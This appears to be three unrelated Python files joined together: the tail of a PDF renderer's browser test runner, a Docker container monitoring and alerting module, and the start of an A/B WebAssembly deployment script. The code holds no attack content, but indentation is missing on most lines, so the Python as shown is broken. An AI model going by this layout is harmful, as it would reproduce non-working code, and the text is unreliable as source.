r0Page, r1Page = round0[page], round1[page]
if r0Page is None:
break
if r0Page.snapshot != r1Page.snapshot:
print 'TEST-UNEXPECTED-FAIL | forward-back-forward test', task['id'], '| in', browser, '| first rendering of page', page + 1, '!= second'
passed = False
State.numFBFFailures += 1
if passed:
print 'TEST-PASS | forward-back-forward test', task['id'], '| in', browser
def checkLoad(task, results, browser):
# Load just checks for absence of failure, so if we got here the
# test has passed
print 'TEST-PASS | load test', task['id'], '| in', browser
def processResults(options):
print ''
numFatalFailures = (State.numErrors + State.numFBFFailures)
if 0 == State.numEqFailures and 0 == numFatalFailures:
print 'All regression tests passed.'
else:
print 'OHNOES! Some tests failed!'
if 0 < State.numErrors:
print ' errors:', State.numErrors
if 0 < State.numEqFailures:
print ' different ref/snapshot:', State.numEqFailures
if 0 < State.numFBFFailures:
print ' different first/second rendering:', State.numFBFFailures
    if options.statsFile is not None:
with open(options.statsFile, 'w') as sf:
sf.write(json.dumps(State.stats, sort_keys=True, indent=4))
print 'Wrote stats file: ' + options.statsFile
def maybeUpdateRefImages(options, browser):
if options.masterMode and (0 < State.numEqFailures or 0 < State.numEqNoSnapshot):
print "Some eq tests failed or didn't have snapshots."
print 'Checking to see if master references can be updated...'
numFatalFailures = (State.numErrors + State.numFBFFailures)
if 0 < numFatalFailures:
print ' No. Some non-eq tests failed.'
else:
print ' Yes! The references in tmp/ can be synced with ref/.'
if options.reftest:
startReftest(browser, options)
if options.noPrompts or prompt('Would you like to update the master copy in ref/?'):
sys.stdout.write(' Updating ref/ ... ')
if not os.path.exists('ref'):
subprocess.check_call('mkdir ref', shell = True)
subprocess.check_call('cp -Rf tmp/* ref/', shell = True)
print 'done'
else:
print ' OK, not updating.'
def startReftest(browser, options):
url = "http://%s:%s" % (SERVER_HOST, options.port)
url += "/test/resources/reftest-analyzer.xhtml"
url += "#web=/test/eq.log"
try:
browser.setup()
browser.start(url)
print "Waiting for browser..."
browser.process.wait()
finally:
teardownBrowsers([browser])
print "Completed reftest usage."
def runTests(options, browsers):
try:
        shutil.rmtree(TEST_SNAPSHOTS)
    except OSError, e:
        if e.errno != 2: # folder doesn't exist
            print >>sys.stderr, 'Deleting', TEST_SNAPSHOTS, 'failed!'
t1 = time.time()
try:
startBrowsers(browsers, options, '/test/test_slave.html')
while not State.done:
for b in State.lastPost:
if State.remaining[b] > 0 and int(time.time()) - State.lastPost[b] > BROWSER_TIMEOUT:
print 'TEST-UNEXPECTED-FAIL | test failed', b, "has not responded in", BROWSER_TIMEOUT, "s"
State.numErrors += State.remaining[b]
State.remaining[b] = 0
checkIfDone()
time.sleep(1)
processResults(options)
finally:
teardownBrowsers(browsers)
t2 = time.time()
print "Runtime was", int(t2 - t1), "seconds"
if State.eqLog:
        State.eqLog.close()
if options.masterMode:
maybeUpdateRefImages(options, browsers[0])
elif options.reftest and State.numEqFailures > 0:
print "\nStarting reftest harness to examine %d eq test failures." % State.numEqFailures
startReftest(browsers[0], options)
def runUnitTests(options, browsers, url, name):
t1 = time.time()
try:
startBrowsers(browsers, options, url)
while UnitTestState.browsersRunning > 0:
for b in UnitTestState.lastPost:
if UnitTestState.lastPost[b] != None and int(time.time()) - UnitTestState.lastPost[b] > BROWSER_TIMEOUT:
print 'TEST-UNEXPECTED-FAIL | test failed', b, "has not responded in", BROWSER_TIMEOUT, "s"
UnitTestState.lastPost[b] = None
UnitTestState.browsersRunning -= 1
UnitTestState.numErrors += 1
time.sleep(1)
print ''
print 'Ran', UnitTestState.numRun, 'tests'
if UnitTestState.numErrors > 0:
print 'OHNOES! Some', name, 'tests failed!'
print ' ', UnitTestState.numErrors, 'of', UnitTestState.numRun, 'failed'
else:
print 'All', name, 'tests passed.'
finally:
teardownBrowsers(browsers)
t2 = time.time()
print '', name, 'tests runtime was', int(t2 - t1), 'seconds'
def main():
optionParser = TestOptions()
options, args = optionParser.parse_args()
options = optionParser.verifyOptions(options)
    if options is None:
sys.exit(1)
if options.unitTest or options.fontTest:
httpd = TestServer((SERVER_HOST, options.port), UnitTestHandler)
httpd_thread = threading.Thread(target=httpd.serve_forever)
httpd_thread.setDaemon(True)
httpd_thread.start()
browsers = setUpUnitTests(options)
if len(browsers) > 0:
if options.unitTest:
runUnitTests(options, browsers, '/test/unit/unit_test.html', 'unit')
if options.fontTest:
runUnitTests(options, browsers, '/test/font/font_test.html', 'font')
else:
httpd = TestServer((SERVER_HOST, options.port), PDFTestHandler)
httpd.masterMode = options.masterMode
httpd_thread = threading.Thread(target=httpd.serve_forever)
httpd_thread.setDaemon(True)
httpd_thread.start()
browsers = setUp(options)
if len(browsers) > 0:
runTests(options, browsers)
else:
# just run the server
print "Running HTTP server. Press Ctrl-C to quit."
try:
while True:
time.sleep(1)
except (KeyboardInterrupt):
print "\nExiting."
if __name__ == '__main__':
main()
|
mdocker.py
|
#!/usr/bin/env python
#-*- encoding: utf-8 -*-
from datetime import datetime
from config import *
from . import mdb, apush
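# Names used below but not imported explicitly (variant, utils, formator,
# docker, traceback, time, os, re, threading) are assumed to be provided by the
# wildcard `from config import *` above.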
dclient = variant.dclient
def get_dkinfo():
try:
dclient.ping()
except Exception as e:
return {"errmsg": str(e)}
dkinfo = dclient.info()
cpu_usage, mem_usage = get_cm_usage()
retval = {
'URI': '',
'ID': utils.get_sha1(dkinfo['ID']),
'Name': dkinfo['Name'],
'ProductLicense': dkinfo.get('ProductLicense',''),
'ServerVersion': dkinfo['ServerVersion'],
'SystemTime': formator.get_ts_from_utcstr(dkinfo['SystemTime']),
'NCPU': dkinfo['NCPU'], 'CpuUsage': cpu_usage,
'MemTotal': dkinfo['MemTotal'], 'MemUsage': mem_usage,
'OperatingSystem': dkinfo['OperatingSystem'],
'OSType': dkinfo['OSType'],
'Images': dkinfo['Images'],
'Containers': dkinfo['Containers'],
}
return retval
def dict_container(cobj):
if isinstance(cobj, docker.models.containers.Container):
return {
'short_id': cobj.short_id,
'name': cobj.name,
'image': cobj.attrs['Config']['Image'],
'status': cobj.status,
'Created': int(formator.get_ts_from_utcstr(cobj.attrs['Created'])),
'StartedAt': formator.get_docker_status(cobj.attrs['State']['Running'], cobj.attrs['State']['ExitCode'], cobj.attrs['State']['StartedAt']),
'ports': ','.join(set([x.split('/')[0] for x in cobj.ports.keys()])),
}
elif isinstance(cobj, dict):
return {
'short_id': cobj['Id'][:10],
'name': cobj['Names'][0][1:],
'image': cobj['Image'],
'status': cobj['State'],
'Created': cobj['Created'],
'StartedAt': cobj['Status'],
'ports': ','.join(set(['%s'%(x['PublicPort']) for x in cobj['Ports'] if 'PublicPort' in x and 'Type' in x])),
}
else:
return {}
def list_container():
try:
retval = [dict_container(x) for x in dclient.api.containers(all=True)]
except Exception as e:
retval = []
return retval
def exists_container(cname):
try:
retval = [x for x in dclient.api.containers(all=True) if x['Names'][0][1:]==cname]
except Exception as e:
retval = []
return bool(retval)
def get_container(cname):
try:
return dict_container(get_dct_container(cname))
except Exception as e:
traceback.print_exc()
return {"errmsg":e}
def get_dct_container(cname):
try:
retval = [x for x in dclient.api.containers(all=True) if x['Names'][0][1:]==cname]
except Exception as e:
retval = []
if not retval:
raise docker.errors.NotFound("No such container: %s"%cname)
else:
return retval[0]
def start_container(cname):
try:
dclient.containers.get(cname).start()
return dict_container(get_dct_container(cname))
except Exception as e:
traceback.print_exc()
return {"errmsg":e}
def restart_container(cname):
try:
dclient.containers.get(cname).restart()
return dict_container(get_dct_container(cname))
except Exception as e:
traceback.print_exc()
return {"errmsg":e}
def stop_container(cname):
try:
dclient.containers.get(cname).stop()
return dict_container(get_dct_container(cname))
except Exception as e:
traceback.print_exc()
return {"errmsg":e}
def remove_container(cname):
try:
dclient.api.remove_container(cname, v=True, force=True)
return {"errmsg":""}
except Exception as e:
traceback.print_exc()
return {"errmsg":e}
def inspect_container(cname):
try:
cobj = dclient.containers.get(cname)
cdct = get_dct_container(cname)
nets = [(key, val) for key, val in utils.copy_dict(cobj.attrs['NetworkSettings'], ['IPAddress', 'Gateway']).items()]
if (not nets or not nets[0] or not nets[0][1] ) and cobj.attrs['HostConfig']['NetworkMode'] in cobj.attrs['NetworkSettings']['Networks']:
nets = [(key, val) for key, val in utils.copy_dict(cobj.attrs['NetworkSettings']['Networks'][ cobj.attrs['HostConfig']['NetworkMode'] ], ['IPAddress', 'Gateway']).items()]
return {"body":{
'Cmd': cdct['Command'],
'Env': [x.split('=') for x in cobj.attrs['Config']['Env']],
'Mounts': [utils.copy_dict(x, ['Source', 'Destination', 'Mode']) for x in cobj.attrs['Mounts']],
'Networks': nets,
'Ports': [(key, '%s:%s'%(val[0]['HostIp'],val[0]['HostPort'])) for key, val in cobj.attrs['NetworkSettings']['Ports'].items() if val],
}}
except Exception as e:
traceback.print_exc()
return {"errmsg":e}
def logs_container_tail(cname, lines):
try:
retdat = dclient.api.logs(cname, tail=lines, timestamps=True).decode().strip()
retdat = [x3.strip().split(' ', 1) for x1 in retdat.split('\n') for x2 in x1.split('\r') for x3 in x2.split('\r\n') if x3.strip()]
return {'body':retdat}
except Exception as e:
traceback.print_exc()
return {'errmsg':str(e)}
def logs_container_forward(cname, lines, tsbase):
from datetime import datetime, timedelta
try:
cdct = get_dct_container(cname)
if len(tsbase)==30 and tsbase.startswith('20') and tsbase.endswith('Z'):
dtbase = datetime.fromisoformat(tsbase[:26])
else:
dtbase = datetime.fromisoformat(tsbase)
retdat = recurse_forward(cname, cdct['Created'], dtbase, lines, -1, [])
retdat = [x for x in retdat if x[0]<tsbase]
retval = retdat[-lines:]
return {'body':retval}
except Exception as e:
traceback.print_exc()
return {'errmsg':str(e)}
def recurse_forward(cname, createtime, dtbase, lines, movedays, retval=None):
    if retval is None:
        retval = []
from datetime import datetime, timedelta
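    # Fetches the window [dtbase + movedays, dtbase + 1s] (movedays starts at -1,
    # i.e. one day back) and, while fewer than `lines` entries have been collected
    # and the container's creation time has not been passed, recurses with the
    # window doubled. recurse_backward below mirrors this going forward in time.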
dt1, dt2 = dtbase+timedelta(days=movedays), dtbase+timedelta(seconds=1)
retdat = dclient.api.logs(cname, timestamps=True, since=dt1, until=dt2).decode().strip()
retdat = [x3.strip().split(' ', 1) for x1 in retdat.split('\n') for x2 in x1.split('\r') for x3 in x2.split('\r\n') if x3.strip()]
retval = retdat + retval
if (lines=='all' or len(retval) < int(lines)) and dt2.timestamp() > createtime:
retval = recurse_forward(cname, createtime, dt1, lines, movedays*2, retval)
return retval
def logs_container_backward(cname, lines, tsbase):
from datetime import datetime, timedelta
try:
cdct = get_dct_container(cname)
if len(tsbase)==30 and tsbase.startswith('20') and tsbase.endswith('Z'):
dtbase = datetime.fromisoformat(tsbase[:26])
else:
dtbase = datetime.fromisoformat(tsbase)
lastdata = logs_container_tail(cname, 1)
tslast = lastdata['body'][0][0] if lastdata.get('body') else ''
retdat = recurse_backward(cname, tslast, dtbase, lines, 1, [])
retdat = [x for x in retdat if x[0]>tsbase]
retval = retdat[:lines]
return {'body':retval}
except Exception as e:
traceback.print_exc()
return {'errmsg':str(e)}
def recurse_backward(cname, tslast, dtbase, lines, movedays, retval=None):
    if retval is None:
        retval = []
from datetime import datetime, timedelta
dt1, dt2 = dtbase, dtbase+timedelta(days=movedays)
retdat = dclient.api.logs(cname, timestamps=True, since=dt1, until=dt2).decode().strip()
retdat = [x3.strip().split(' ', 1) for x1 in retdat.split('\n') for x2 in x1.split('\r') for x3 in x2.split('\r\n') if x3.strip()]
retval = retval + retdat
if (lines=='all' or len(retval) < int(lines)) and (len(retval)>0 and retval[-1][0]<tslast):
retval = recurse_backward(cname, tslast, dt2, lines, movedays*2, retval)
return retval
def avg(l):
r = [x for x in l if x != None]
if len(r) == 0:
return 0
else:
return sum(r)/len(r)
def nsum(l):
r = [x for x in l if x != None]
return sum(r)
def container_exists_byname(cname):
return cname in [cobj['Names'][0][1:] for cobj in dclient.api.containers(all=True)]
def get_stat_mindata(ts='0'):
cnames = [x['name'] for x in list_container()]
if ts and formator.isFloat(ts):
ff = lambda val : [x for x in val if x[0]>float(ts)]
retval = dict([(cname,ff(val)) for cname, val in variant.mindata.items() if cname in cnames])
else:
retval = dict([(cname,val) for cname, val in variant.mindata.items() if cname in cnames])
return retval
def get_cm_usage(cname=''):
alldata = get_stat_mindata()
retdat1 = [datas[-1][1] for key, datas in alldata.items() if (key==cname or cname=='') and len(datas)>0 and len(datas[-1])==12]
retdat2 = [datas[-1][2] for key, datas in alldata.items() if (key==cname or cname=='') and len(datas)>0 and len(datas[-1])==12]
return sum(retdat1), sum(retdat2)
def get_top6_mindata(ts='0'):
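    # Builds the chart series: the five containers with the highest current
    # memory usage keep their own minute data, everything else is summed per
    # timestamp into an aggregated 'Others' series (six series in total).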
from functools import cmp_to_key
alldata = get_stat_mindata(ts)
top6name = []
for cname in alldata.keys():
top6name.append([cname, alldata[cname][-1][2] if len(alldata[cname])>0 and len(alldata[cname][-1])>2 else 0])
top6name.sort(key=cmp_to_key(lambda a, b: b[1]-a[1]))
retval = {}
count = 1
for cname, fake in top6name:
retval[cname] = alldata.pop(cname, [])
count += 1
if count>=6: break
timearray = []
for cname, tmpl in alldata.items():
timearray.extend([x[0] for x in tmpl])
timearray = list(set(timearray))
timearray.sort()
retval['Others'] = {}
for cname, tmpl in alldata.items():
for curritem in tmpl:
currtime = curritem[0]
saveitem = retval['Others'].get(currtime)
if not saveitem:
retval['Others'][currtime] = curritem
else:
retval['Others'][currtime] = [
currtime,
round(saveitem[1] + curritem[1], 2),
saveitem[2] + curritem[2],
saveitem[3] + curritem[3],
saveitem[4] + curritem[4],
saveitem[5] + curritem[5],
saveitem[6] + curritem[6],
saveitem[7] + curritem[7],
saveitem[8] + curritem[8],
saveitem[9] + curritem[9],
saveitem[10] + curritem[10],
saveitem[11] + curritem[11],
]
retval['Others'] = list(retval['Others'].values())
retval['Others'].sort(key=cmp_to_key(lambda a, b: a[0]-b[0]))
return retval
def stat_container(cname):
ster = variant.staters[cname]
try:
return next(ster)
except StopIteration as e:
utils.outMessage('Stat StopIteration: %s'%cname)
if container_exists_byname(cname):
ster = dclient.api.stats(cname, decode=True)
variant.staters[cname] = ster
else:
variant.staters.pop(cname)
except docker.errors.NotFound as e:
utils.outMessage('Stat NotFound: %s'%cname)
variant.staters.pop(cname)
except Exception as e:
utils.outMessage('Stat Exception: %s'%cname)
variant.staters.pop(cname)
def stat_transfer(cname, sdat):
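    # Converts one docker stats sample into the 12-column row used throughout
    # this module (the minute/hour aggregators index into it by position):
    #   [0] timestamp    [1] CPU %         [2] memory bytes   [3] memory %
    #   [4] rx total     [5] tx total      [6] rx delta       [7] tx delta
    #   [8] blkio read   [9] blkio write   [10] read delta    [11] write delta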
rdat = None
if sdat and sdat.get('pids_stats') and sdat.get('cpu_stats'):
cs = sdat['cpu_stats']
ds = sdat.get('blkio_stats',{}).get('io_service_bytes_recursive',[])
ldat = variant.secdata[cname][-1] if variant.secdata[cname] else []
stime = formator.get_ts_from_utcstr(sdat['read'])
if stime==0 and ldat:
stime = ldat[0]+1
rdat = [
stime,
round(cs['cpu_usage']['total_usage']/cs['system_cpu_usage']*100,2),
sdat['memory_stats']['usage'],
round(sdat['memory_stats']['usage']/sdat['memory_stats']['limit']*100,2),
sdat['networks']['eth0']['rx_bytes'] if 'networks' in sdat else 0,
sdat['networks']['eth0']['tx_bytes'] if 'networks' in sdat else 0,
None,
None,
sum([x['value'] for x in ds if x['op']=='Read']),
sum([x['value'] for x in ds if x['op']=='Write']),
None,
None,
]
if ldat:
rdat[6] = rdat[4]-ldat[4] if rdat[4]>=ldat[4] else rdat[4]
rdat[7] = rdat[5]-ldat[5] if rdat[5]>=ldat[5] else rdat[5]
rdat[10] = rdat[8]-ldat[8] if rdat[8]>=ldat[8] else rdat[8]
rdat[11] = rdat[9]-ldat[9] if rdat[9]>=ldat[9] else rdat[9]
variant.secdata[cname].append(rdat)
return rdat
def stat_carry2minute(cname):
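    # Once more than 60 seconds of per-second samples exist, the oldest minute is
    # collapsed into one row: CPU/memory columns are averaged, cumulative totals
    # keep the minute's last value, and the delta columns are summed.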
if not variant.secdata[cname]: return
st1 = variant.secdata[cname][0][0]
st2 = variant.secdata[cname][-1][0]
if st2-st1>60:
tmpl = []
cmin = datetime.fromtimestamp(variant.secdata[cname][0][0]).minute
lmin = cmin
while len(variant.secdata[cname])>0 and lmin==cmin:
tmpl.append(variant.secdata[cname].pop(0))
if len(variant.secdata[cname])>0:
cmin = datetime.fromtimestamp(variant.secdata[cname][0][0]).minute
if tmpl:
tsec = datetime.fromtimestamp(tmpl[0][0]).second
mdat = [
tmpl[0][0]-tsec,
round(avg([x[1] for x in tmpl]),2),
round(avg([x[2] for x in tmpl])),
round(avg([x[3] for x in tmpl]),2),
tmpl[-1][4],
tmpl[-1][5],
nsum([x[6] for x in tmpl]),
nsum([x[7] for x in tmpl]),
tmpl[-1][8],
tmpl[-1][9],
nsum([x[10] for x in tmpl]),
nsum([x[11] for x in tmpl]),
]
variant.mindata[cname].append(mdat)
return mdat
def stat_carry2hour(cname):
if not variant.mindata[cname]: return
st1 = variant.mindata[cname][0][0]
st2 = variant.mindata[cname][-1][0]
if st2-st1>2*3600 or time.time()-st1>2*3600:
tmpl = []
hmin = datetime.fromtimestamp(variant.mindata[cname][0][0]).hour
lmin = hmin
while len(variant.mindata[cname])>0 and lmin==hmin:
tmpl.append(variant.mindata[cname].pop(0))
if len(variant.mindata[cname])>0:
hmin = datetime.fromtimestamp(variant.mindata[cname][0][0]).hour
if tmpl:
tmin = datetime.fromtimestamp(tmpl[0][0]).minute
tsec = datetime.fromtimestamp(tmpl[0][0]).second + tmin*60
hdat = [
tmpl[0][0]-tsec,
round(avg([x[1] for x in tmpl]),2),
round(avg([x[2] for x in tmpl])),
round(avg([x[3] for x in tmpl]),2),
tmpl[-1][4],
tmpl[-1][5],
nsum([x[6] for x in tmpl]),
nsum([x[7] for x in tmpl]),
tmpl[-1][8],
tmpl[-1][9],
nsum([x[10] for x in tmpl]),
nsum([x[11] for x in tmpl]),
]
mdb.insert_stats(cname, hdat)
def stat_run_once():
for cname in list(variant.staters.keys()):
sdat = stat_container(cname)
stat_transfer(cname, sdat)
mdat = stat_carry2minute(cname)
alert_watch_2345(cname, mdat)
if mdat and variant.alertcm.get('--sys--'):
cpusum = sum([v[-1][1] for v in variant.mindata.values() if v])
memsum = sum([v[-1][2] for v in variant.mindata.values() if v])
fakemdat = [time.time(), cpusum, memsum]
alert_watch_2345('--sys--', fakemdat)
stat_carry2hour(cname)
def stat_init():
stat_keepiters()
cnames = variant.staters.keys()
fpath = utils.prefixStorageDir('stats.cache')
if os.path.isfile(fpath):
with open(fpath) as fobj:
savdat = formator.json_object(fobj.read())
if 'secdata' in savdat:
variant.secdata = savdat.get('secdata', {})
for key in list(variant.secdata.keys()):
if key not in cnames:
variant.secdata.pop(key)
else:
variant.secdata = dict([(x, []) for x in variant.staters.keys()])
if 'mindata' in savdat:
variant.mindata = savdat.get('mindata', {})
for key in list(variant.mindata.keys()):
if key not in cnames:
variant.mindata.pop(key)
else:
variant.mindata = dict([(x, []) for x in variant.staters.keys()])
def stat_closeall():
variant.staters = {}
savdat = formator.json_string({'secdata': variant.secdata, 'mindata':variant.mindata})
with open(utils.prefixStorageDir('stats.cache'),'w+') as fobj:
fobj.write(savdat)
def stat_keepiters():
for cobj in dclient.api.containers(all=True):
cname = cobj['Names'][0][1:]
if cname not in variant.staters:
variant.staters[cname] = dclient.api.stats(cname, decode=True)
if cname not in variant.secdata:
variant.secdata[cname] = []
if cname not in variant.mindata:
variant.mindata[cname] = []
def logs_classall():
variant.logiers = {}
def logs_keepiters():
needskey = list(variant.alertlg.keys())
for key in list(variant.logiers.keys()):
if key not in needskey:
variant.logiers[key].close()
variant.logiers.pop(key)
for cname in needskey:
if cname not in variant.logiers:
try:
cobj = get_container(cname)
if cobj.get('status') == 'running':
variant.logiers[cname] = dclient.api.logs(cname, stream=True, timestamps=True, tail=0)
except Exception as e:
traceback.print_exc()
if cname not in variant.logthds:
variant.logthds[cname] = threading.Thread(target=logs_run_once, args=(cname,), daemon=True)
variant.logthds[cname].start()
def logs_run_once(cname):
while True:
if cname not in variant.logiers: break
if cname not in variant.alertlg: break
time.sleep(0.1)
try:
            logtxt = next(variant.logiers[cname]).decode()
logtxt = logtxt.split(' ',1)
timestamp = logtxt[0] if len(logtxt)==2 else ''
content = logtxt[1] if len(logtxt)==2 else logtxt[0]
for aobj in variant.alertlg[cname]:
needtest = 'LASTRUNTIME' not in aobj or time.time()-aobj.LASTRUNTIME>60
if not needtest:
continue
match = re.match(aobj.ALSTR, content)
aobj.LASTRUNTIME = time.time()
if (match or content.find(aobj.ALSTR)>=0) and (content.find('INSERT INTO DM_MESSAGE')<0):
aobj.LASTALERTTIME = aobj.LASTRUNTIME
aobj.ALERTCOUNT = aobj.get('ALERTCOUNT', 0) + 1
testmsg = {"ALID": aobj.ALID, "ISPUSHED": aobj.ALPUSH if aobj.ALPUSH==1 else 0, "MSGSTAMP":formator.get_ts_from_utcstr(timestamp)}
testmsg["MSGBODY"] = "%s Log keyword found: %s\n\n%s %s"%(cname, aobj.ALSTR, timestamp, content)
msgret = mdb.new_message(testmsg)
lobj = variant.pubkeys.get(aobj.LICENSEID,{})
if not msgret.get('errmsg') and aobj.ALPUSH==1 and lobj.get('push_expire',0)>time.time():
try:
pshret = apush.pushNotification(aobj.LICENSEID,
lobj.get('SERVERID',''),
lobj.get('DEVICEID',''),
'%s Log alert'%lobj.get('SERVERNAME',''),
testmsg["MSGBODY"], 'domapp://message/%s?lid=%s'%(msgret['MSGID'],aobj.LICENSEID))
except Exception as e:
utils.outMessage(str(e))
except Exception as e:
variant.logiers.pop(cname, None)
traceback.print_exc()
utils.outMessage(str(e))
variant.logiers.pop(cname, None)
variant.logthds.pop(cname, None)
def stat_daemon():
if variant['enable_stat'] != '1': return
try:
stat_init()
utils.outMessage('Start stat_daemon')
while True:
if variant['enable_stat'] != '1':
break
time.sleep(0.01)
stat_keepiters()
stat_run_once()
logs_keepiters()
utils.outMessage('Stop stat_daemon')
stat_closeall()
logs_classall()
except (KeyboardInterrupt, SystemExit):
stat_closeall()
logs_classall()
utils.outMessage('Interrupt stat_daemon')
def alert_watch_2345(cname, mdat):
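    # Re-test throttling: a check is re-run after 1 minute, backing off to
    # 2/5/15/30 minutes as ALERTCOUNT grows, and from the 6th consecutive alert
    # only once per calendar day; a passing check clears ALERTCOUNT again.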
for aobj in variant.alertcm.get(cname,[])+variant.alertph.get(cname,[]):
if not mdat and aobj.ALTYPE in (2,3):
continue
needtest = 'LASTRUNTIME' not in aobj or time.time()-aobj.LASTRUNTIME>60
if not needtest:
continue
if 'ALERTCOUNT' in aobj:
if aobj.ALERTCOUNT == 1:
pass
elif aobj.ALERTCOUNT == 2:
needtest = time.time()-aobj.LASTRUNTIME>2*60
elif aobj.ALERTCOUNT == 3:
needtest = time.time()-aobj.LASTRUNTIME>5*60
elif aobj.ALERTCOUNT == 4:
needtest = time.time()-aobj.LASTRUNTIME>15*60
elif aobj.ALERTCOUNT == 5:
needtest = time.time()-aobj.LASTRUNTIME>30*60
elif aobj.ALERTCOUNT >= 6:
needtest = datetime.fromtimestamp(time.time()).day != datetime.fromtimestamp(aobj.LASTRUNTIME).day
if needtest: aobj.ALERTCOUNT = 0
if not needtest:
continue
testisok = True
testmsg = {"ALID": aobj.ALID, "ISPUSHED": aobj.ALPUSH if aobj.ALPUSH==1 else 0, "MSGSTAMP":mdat[0]}
testtlt = ''
if aobj.ALTYPE == 2 and mdat:
testisok = mdat[1] < aobj.ALVAL
if not testisok:
testmsg["MSGBODY"] = "CPU usage %s > the set value %s"%(round(mdat[1],2), aobj.ALVAL)
testtlt = 'CPU alert'
if aobj.ALTYPE == 3 and mdat:
testisok = mdat[2] < aobj.ALVAL*1024*1024
if not testisok:
testmsg["MSGBODY"] = "Memory usage %s MB > the set value %s MB"%(round(mdat[2]/1024/1024,2), aobj.ALVAL)
testtlt = 'Memory alert'
if aobj.ALTYPE == 4:
ipport = aobj.ALSTR.split(":")
timeout = 5
testisok = utils.check_port(ipport[0], ipport[1], timeout)
if not testisok:
testmsg["MSGBODY"] = "Socket port %s unreachable in %d seconds."%(aobj.ALSTR, timeout)
testtlt = 'Socket alert'
if aobj.ALTYPE == 5:
timeout = 15
retdat = utils.check_http(aobj.ALSTR, timeout)
testisok = retdat[0]<400
if not testisok:
testmsg["MSGBODY"] = "HTTP %s unreachable in %d seconds. %s %s"%(aobj.ALSTR, timeout, retdat[0], retdat[1])
testtlt = 'Http alert'
aobj.LASTRUNTIME = time.time()
if not testisok:
aobj.LASTALERTTIME = aobj.LASTRUNTIME
aobj.ALERTCOUNT = aobj.get('ALERTCOUNT', 0) + 1
testmsg["MSGBODY"] = ('System' if cname=='--sys--' else cname) + ' ' + testmsg["MSGBODY"]
msgret = mdb.new_message(testmsg)
lobj = variant.pubkeys.get(aobj.LICENSEID,{})
if not msgret.get('errmsg') and aobj.ALPUSH==1 and lobj.get('push_expire',0)>time.time():
try:
pshret = apush.pushNotification(aobj.LICENSEID,
lobj.get('SERVERID',''),
lobj.get('DEVICEID',''),
'%s %s'%(lobj.get('SERVERNAME',''), testtlt),
testmsg["MSGBODY"], 'domapp://message/%s?lid=%s'%(msgret['MSGID'],aobj.LICENSEID))
except Exception as e:
utils.outMessage(str(e))
else:
aobj.pop('ALERTCOUNT', None)
def dict_image(iobj, tag='', parents=[], all_container=[]):
if isinstance(iobj, docker.models.images.Image):
retval = {
'id': iobj.id,
'name': tag or ','.join(iobj.tags),
'Created': formator.get_ts_from_utcstr(iobj.attrs['Created']),
'Size': iobj.attrs['Size'],
'Used': 0,
'ChildUsed': 0,
'Running': 0,
'Containers': [],
'Parent': parents[0] if parents else {},
'Children': [],
}
elif isinstance(iobj, dict):
retval = {
'id': iobj['Id'],
'name': tag or ','.join(iobj['RepoTags']),
'Created': iobj['Created'],
'Size': iobj['Size'],
'Used': 0,
'ChildUsed': 0,
'Running': 0,
'Containers': [],
'Parent': parents[0] if parents else {},
'Children': [],
}
else:
retval = {}
for c in all_container:
if isinstance(c, dict) and isinstance(iobj, dict) and (retval['name'].replace(':latest','') == c['Image'].replace(':latest','') or retval['id']==c['ImageID']):
retval['Containers'].append(dict_container(c))
retval['Used'] += 1
if c['State']=='running':
retval['Running'] += 1
if isinstance(c, docker.models.containers.Container) and isinstance(iobj, docker.models.images.Image) and retval['name'].replace(':latest','') == c.attrs['Config']['Image'].replace(':latest',''):
retval['Containers'].append(dict_container(c))
retval['Used'] += 1
if c.status=='running':
retval['Running'] += 1
return retval
def tree_image():
retdic = {}
try:
all_container = dclient.api.containers(all=True)
for m in dclient.api.images():
parents = [{'Created':x['Created'],'name':ptag,'id':x['Id']} for x in dclient.api.history(m['Id']) for ptag in (x['Tags'] or []) if m['Id']!=x['Id']]
if m['RepoTags']:
for tag in m['RepoTags']:
mdat = dict_image(m, tag, parents, all_container)
retdic[mdat['id']] = mdat
elif m['RepoDigests']:
tag = m['RepoDigests'][0].split('@')[0] + ':<none>'
mdat = dict_image(m, tag, parents, all_container)
retdic[mdat['id']] = mdat
import copy
for mid, mdat in retdic.items():
if mdat['Parent'] and mdat['Parent']['id'] in retdic:
child = copy.copy(mdat)
child.pop('Parent',None)
child.pop('Containers',None)
child.pop('Used',None)
child.pop('ChildUsed',None)
child.pop('Running',None)
child.pop('Children',None)
retdic[mdat['Parent']['id']]['Children'].append(child)
retdic[mdat['Parent']['id']]['ChildUsed'] += mdat['Used']
except Exception as e:
traceback.print_exc()
retdic = {}
return retdic
def list_image():
try:
retdic = tree_image()
retval = list(retdic.values())
return retval
except Exception as e:
traceback.print_exc()
return []
def get_image_byid(imgid):
try:
retdic = tree_image()
return retdic.get(imgid,{})
except Exception as e:
traceback.print_exc()
return {}
def get_image_byname(imgname):
try:
retdic = tree_image()
retval = {}
for key, val in retdic.items():
if val['name'].split(':')[0]==imgname:
retval = val
except Exception as e:
traceback.print_exc()
return {}
else:
return retval
def remove_image(iname):
try:
dclient.api.remove_image(iname)
return {"errmsg":""}
except Exception as e:
traceback.print_exc()
return {"errmsg":e}
|
deployment.py
|
import os
import wasm3, base64, time, traceback
from multiprocessing import Process
from fastapi import FastAPI, Request
from gpiozero import LED
data_dir = f"{os.getcwd()}/../data"
wasm_process_handler = None
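# A/B slot deployment: a new .wasm (plus its .sha256) is written to the inactive
# slot, the active_deployment marker file is flipped, and the wasm process is
# restarted from the now-active slot. If starting it fails, start_wasm_process()
# flips back to the previous slot and restarts again.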
def update_partial(file, sha256hash, deployment_id):
inactive_deployment = get_inactive_deployment()
try:
with open(f"{data_dir}/deployment_{inactive_deployment}.wasm", "wb") as f:
f.write(file)
with open(f"{data_dir}/deployment_{inactive_deployment}.sha256", "wb") as f:
f.write(sha256hash)
f.write(b" ")
f.write(deployment_id.encode())
switch_deployment()
restart_wasm_process()
except Exception as e:
print(e)
def get_active_deployment():
if os.path.isfile(f"{data_dir}/active_deployment"):
with open(f"{data_dir}/active_deployment", "r") as f:
return f.read().strip("\n")
else:
with open(f"{data_dir}/active_deployment", "w") as f:
f.write("A")
return "A"
def get_inactive_deployment():
return "B" if get_active_deployment() == "A" else "A"
def switch_deployment():
with open(f"{data_dir}/active_deployment", "r+") as f:
data = f.read()
new_data = "B" if data == "A" else "A"
f.seek(0)
f.write(new_data)
f.truncate()
def env_delay(s):
time.sleep(float(s) / 1000)
return 0
def env_print(m3rt, *args):
    out = bytes(m3rt.get_memory(0)[args[0]:args[0] + args[1]]).decode()
print(out.strip("\n"))
return 0
def env_pinMode(pin, mode):
"""
" This function is actually not required, because gpiozero does it automatically.
" But the WebAssembly App expects this function to be present, so this is a dummy.
"""
pass
LEDs = {}
